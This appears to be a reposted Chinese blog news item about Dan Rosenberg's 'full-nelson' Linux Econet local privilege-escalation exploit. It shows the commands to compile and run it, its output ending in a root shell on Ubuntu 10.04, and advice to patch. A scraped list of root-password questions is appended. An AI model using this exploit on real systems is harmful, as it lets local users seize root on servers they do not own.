gundam info jp:Linux 再爆root 帐号提权漏洞

来源：百度文库编辑：偶看新闻时间：2024/04/19 08:56:02

Linux 再爆root 帐号提权漏洞系统安全高手 Dan Rosenberg 发布了一段 C 程序，这段200多行的程序利用了 Linux Econet 协议的3个安全漏洞，可以导致本地帐号对系统进行拒绝服务或特权提升，也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell，以下在 update 过的 Ubuntu 10.04 Server LTS 上测试通过：

$ sudo apt-get update
$ sudo apt-get upgrade
$ uname -r
2.6.32-21-server
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Resolving kernel addresses…
[+] Resolved econet_ioctl to 0xffffffffa0131510
[+] Resolved econet_ops to 0xffffffffa0131600
[+] Resolved commit_creds to 0xffffffff8108b820
[+] Resolved prepare_kernel_cred to 0xffffffff8108bc00
[*] Calculating target…
[*] Failed to set Econet address.
[*] Triggering payload…
[*] Got root!
#

由于 RHEL/CentOS 默认不支持 Econet 协议，所以测试没有通过：

# yum update
$ uname -r
2.6.18-194.26.1.el5
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Failed to open file descriptors.

如果在企业环境用 Ubuntu 的话可能会比较杯具了，几百个帐号里总可以找到一两个帐号被内部或外部人员通过上面这段程序拿到 root，这对服务器的危害是毁灭性的。前天还在说 Ubuntu 在内核方面无作为，现在想起来还有点后怕。VPSee 提醒正在使用多个普通帐号登录 Ubuntu VPS 的朋友及时升级或打内核补丁，出售 VPN/SSH 帐号、提供免费 SSH 的商家尤其要小心 “客户” 捣乱，使用其他 Linux 发行版的朋友也最好检查一下自己的 VPS 有没有这些高危漏洞。

我的linux只能root登录,其它帐号登录提示认证失败,如何解决?? linux 怎样输入root口令什么是用户帐号？什么是root用户帐号? [root@localhost root] 各个单词是什么意思在linux里面？不用root登录的linux如何获取root用户密码 Linux下怎么禁止更改Root用户密码？ linux怎样以root身份进入呀 Virtual PC运行linux.vhd后root密码多少？ linux centos 的root密码丢了，怎么办？ Linux丢失root密码怎样用GRUB或者LILO找回？管理LINUX系统时,为什么ROOT用户名不能用了 linux mysql 修改ROOT密码忘记使用PASSWORD函数了！！ LINUX密码忘了，该如何进入？（root密码也忘了） Linux中，超级用户root与一般用户相比，有什么特别之处? Linux中的超级用户root，相对于一般用户而言，有什么特别之处？ linux中的超级用户root，相对于一般用户而言，有什么特别之处？在linux(debian)下,如何建立一个与root相同权限的用户? 在linux系统下，误删了/root，如何恢复? 要往linux的root用户下上传文件，用ftp root用户不可以，请教各位有什么办法或用什么软件能够实现此功能？ [root@redlinux root]# Linux系统会不会有很多漏洞?容易受到攻击吗? 如果我的LINUX的ROOT用户的密码丢失，但又不能重新装系统，该如何处理呢？正在win2000的系统上，安装linux，出现的提示问题是没有root partation,该如何解决呢？ Root是什么?